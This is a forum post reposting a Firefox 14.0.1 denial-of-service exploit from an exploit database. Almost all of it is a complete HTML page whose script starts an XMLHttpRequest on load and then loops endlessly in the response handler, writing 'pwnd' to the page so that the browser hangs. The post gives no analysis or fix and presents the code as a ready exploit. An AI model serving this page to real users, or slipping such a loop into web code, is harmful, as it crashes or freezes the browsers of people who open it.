Jump to content
Nytro

Mozilla Firefox 14.0.1 Denial of Service Vulnerability

Recommended Posts

Posted

[h=2]Mozilla Firefox 14.0.1 Denial of Service Vulnerability[/h]Author: knowlegend

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>FF-14.0.1 DoS-Exploit by Know v3.0</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<meta name="Description" content="FF-14.0.1 DoS-Exploit by Know v3.0" />

<script type="text/javascript" language="JavaScript">
var CrashIt = false;

if (typeof CrashIt != 'undefined')
{
CrashIt = new XMLHttpRequest();
}
if (!CrashIt)
{
try
{
CrashIt = new ActiveXObject("Msxml2.XMLHTTP");
}
catch(e)
{
try
{
CrashIt = new ActiveXObject("Microsoft.XMLHTTP");
}
catch(e)
{
CrashIt = null;
}
}
}

function load()
{
CrashIt.open('get','bla.php');
CrashIt.onreadystatechange = handleContent;
CrashIt.send(null);
return false;

}

function handleContent()
{

while(CrashIt.readyState != 4)
{
document.getElementById('inhalt').innerHTML = "pwnd";

}
document.getElementById('inhalt').innerHTML = CrashIt.responseText;

}

</script>


</head>
<body onload="load();">
<div id="inhalt"></div>

<body>
</html>

# 1337day.com [2012-12-23]

Sursa: 1337day Inj3ct0r Exploit Database : vulnerability : 0day : shellcode by Inj3ct0r Team

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...